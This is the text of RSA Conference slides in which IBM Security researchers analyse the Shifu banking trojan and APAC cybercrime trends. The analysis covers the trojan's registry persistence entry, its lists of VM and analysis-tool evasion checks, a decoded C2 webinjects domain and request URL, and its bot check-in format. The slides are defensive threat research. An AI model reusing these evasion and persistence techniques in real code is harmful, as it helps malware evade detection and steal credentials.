SESSION ID:

#RSAC

Tal Darsan

Cybercrime Collaboration - The Changing APAC Threat Landscape

TTA1-F01

Threat Research Team LeaderIBM Security

Etay MaorExecutive Security AdvisorIBM Security

#RSAC

New Targets, New Threats

#RSAC

Agenda

Intro – collaboration and localization

Deep dive into Shifu

The dark web

What do we do next?

#RSAC

Cybercriminals Share Intel!

#RSAC

What is Your Career Path?

#RSAC

Target: Singapore

#RSACIt’s Not Just About Bank Accounts and Card Data

Cybercriminals are always looking for other ways to monetize

Example - Healthcare:

Seller:

Easier to steal

More profitable than a credit card

Buyer:

Harder to detect

Many opportunities

#RSAC

Localizing malware to APAC

Choosing specific targets

Local malvertizing or spamming services

Knowledge of internal procedures of local entities

Localized content using language

Localized injections using injection shops

Local money mules

#RSAC

Remember Tsukuba?

#RSAC

Shifu Deep Dive – APAC targeting Malware

#RSAC

#RSAC

Shifu trojan introduction

Introduced by IBM Security / Trusteer on August 2015

Active in the wild since mid 2015

Firstly focused on Japan then eastern Europe financial institiutions

Shares code portions of Shiz and Zeus

Shares characteristics of Gozi and Dridex

#RSAC

Shiz Zeus

Gozi

Dridex

#RSAC

Main features

Domain generation algorithm

Theft from bank apps

Anti research

Stealth

Webinjects configurations

Wipe system restore

#RSAC

Main features

Anti research, VM and sandbox tools

Browser hooking and web injects parser

Keylogger

Bitcoin wallet stealer

Screenshot grabber

Certificate grabber

Endpoint classification and monitoring applications of interest

RAT and bot control module

#RSAC

Shifu’s Infection Chain

VM

1. Drops a copy of itself under %APPADATA% -> <payloads random name>.exe

2. Writing a Windows registry Persistence entry:HKCU\Software\Microsoft\Windows\CurrentVersion\Run\IntelPowerAgent{Decimal Number}Data = rundll32.exe shell32.dll, ShellExec_RunDLL <payloads random name>.exe

3. Drops an Apache server

4. Drops a financial web-injects configuration

Angler EK

#RSAC

Shifu main function

Delete ZoneIdentifier flag that the OS places near the file downloaded from

the Internet to mark it's origin

Mark bitness of OS

Call a function CRC32 value to - make sure a particular process is not

present. If it is – execution stops

Checks for Smart-Card token presence to ensure it’s availability in order to

operate correctly, in case it is present, it will pass the main “Anti Research”

validation function

Calls further anti research functions

#RSAC

Shifu’s Anti Research Address Stored CRC32 Process name.data:0040B120 dd 278CDF58h ; vmtoolsd.exe.data:0040B124 dd 99DD4432h ; vmwareuser.exe.data:0040B12C dd 6D3323D9h ; vmusrvc.exe.data:0040B130 dd 3BFFF885h ; vmsrvc.exe.data:0040B134 dd 64340DCEh ; vboxservice.exe.data:0040B138 dd 63C54474h ; vboxtray.exe.data:0040B13C dd 2B05B17Dh ; xenservice.exe.data:0040B144 dd 77AE10F7h ; wireshark.exe.data:0040B148 dd 0CE7D304Eh ; dumpcap.exe.data:0040B158 dd 0E90ACC42h ; idag.exe.data:0040B15C dd 4231F0ADh ; sysanalyser.exe.data:0040B160 dd 0D20981E0h ; shift_hit.exe.data:0040B174 dd 6AAAE60h ; idaq.exe.data:0040B178 dd 5BA9B1FEh ; procmon.exe.data:0040B17C dd 3CE2BEF3h ; regmon.exe.data:0040B180 dd 0A945E459h ; procexp.exe.data:0040B184 dd 877A154Bh ; peid.exe.data:0040B188 dd 33495995h ; autoruns.exe.data:0040B194 dd 9305F80Dh ; imul.exe.data:0040B198 dd 0C4AAED42h ; emul.exe.data:0040B19C dd 14078D5Bh ; apispy.exe.data:0040B1B0 dd 2AAA273Bh ; joeboxserver.exe.data:0040B1B4 dd 777BE06Ch ; joeboxcontrol.exe

VM

#RSAC

Shifu’s Anti Research

1. Check the presence of the following DLLs in loaded modules/DLL's:• sbiedll.dll • dbghelp.dll • api_log.dll • dir_watch.dll • pstorec.dll

2. Checks presence of the following folders and files on disk:• c:\analysis\sandboxstarter.exe • c:\analysis• c:\insidetm • c:\windows\system32\drivers\vmmouse.sys • c:\windows\system32\drivers\vmhgfs.sys• c:\windows\system32\drivers\vboxmouse.sys

3. Using Windows API functions NetServerGetInfo and NetWkstaGetInfo to receive current machine Network Group name and Domain respectively and compares it with the strings:• WORKGROUP• HOMEIf none of them fits - checks if function output is within Alphanumeric range of characters and whether it contains the string ANALYSERS

4. Calling the function "CompNamePresentAndNotBlacklisted" to make sure computer name doesn't include the following strings:• SANDBOX• FORTINET

VM

#RSAC

Shifu’s Apache Server

1. Shifu downloads an archive file, server.zip from its C2 server

2. server.zip contains an apache server which deployed in the victim’s machine

Purposes:

- Decrypting web injections Host, and receive injected JavaScript from a remote Shifu server

- Modular configuration component

- Innovative approach

#RSAC

Shifu’s Apache Server

To decode the address of remote webinjects server “secure.7375626a6563746472697665722e62697a.moz”

The server perform the hex to text conversation In this case:

7375626a6563746472697665722e62697a = subjectdriver.biz

Replay request to C2 with correct webinjects server:

subjectdriver.biz/?c=script&v=1&b=SECUSER!WIN7X86SP1!E78ACB41&r=[bank-injection-token]

#RSAC

Shifu’s Confgiuration – Dridex smiliarty

#RSAC

botid=%s&ver=%s.%u&up=%u&os=%u&ltime=%s%d&token=%d&cn=%s&av=%s&dmn=%s

Some of Shifu’s known bot commands are:

Communication

#RSAC

MultiCash and MultiCash@Sign – An electronic banking platform that serves

large corporations for the purpose of e-banking across the globe. MultiCash serves

customers all across Europe. Shifu hunts for access credentials to the

MultiCash@Sign plugin banks enable their major customers to use.

Elba5 – Electronic banking platform vendor serving the Austrian market. Shifu

hunts for Elba data that may be found on the infected machine.

HBP Hypo Office Banking – a platform that serves enterprise clients for the

purpose of e-banking via multiple bank accounts. HBP serves the Austria market.

Shifu hunts for HBP customer profile data.

Applications

#RSAC

Applications

#RSAC

• iexplore.exe

• opera.exe

• firefox.exe

• chrome.exe

• maxthon.exe

• java.exe

• javaw.exe

• plugin-container.exe

• acrobat.exe

• acrod32.exe

URLDownloadToFile

HTTPS

SIGNEDfile.exe

infected.exx

File inspection

#RSAC

Dark Web Demo

#RSAC

How Do We Fight Back?

#RSAC

Conclusions

Threat actors are reusing tools and techniques

They are using customization services to target specific regions

Cybercrime intelligence collection is not limited to anti-malware tools – process and procedures are scrutinized

Malware is AV, research AND malware aware

Cybercrime skill gap compression!!!

#RSAC

The Pyramid of Pain

Source: David Bianco

#RSAC

What are the next steps?

Threat intelligence collaboration

Malware detection and behavior biometrics authentication

On a different note: design, implement AND TEST incident response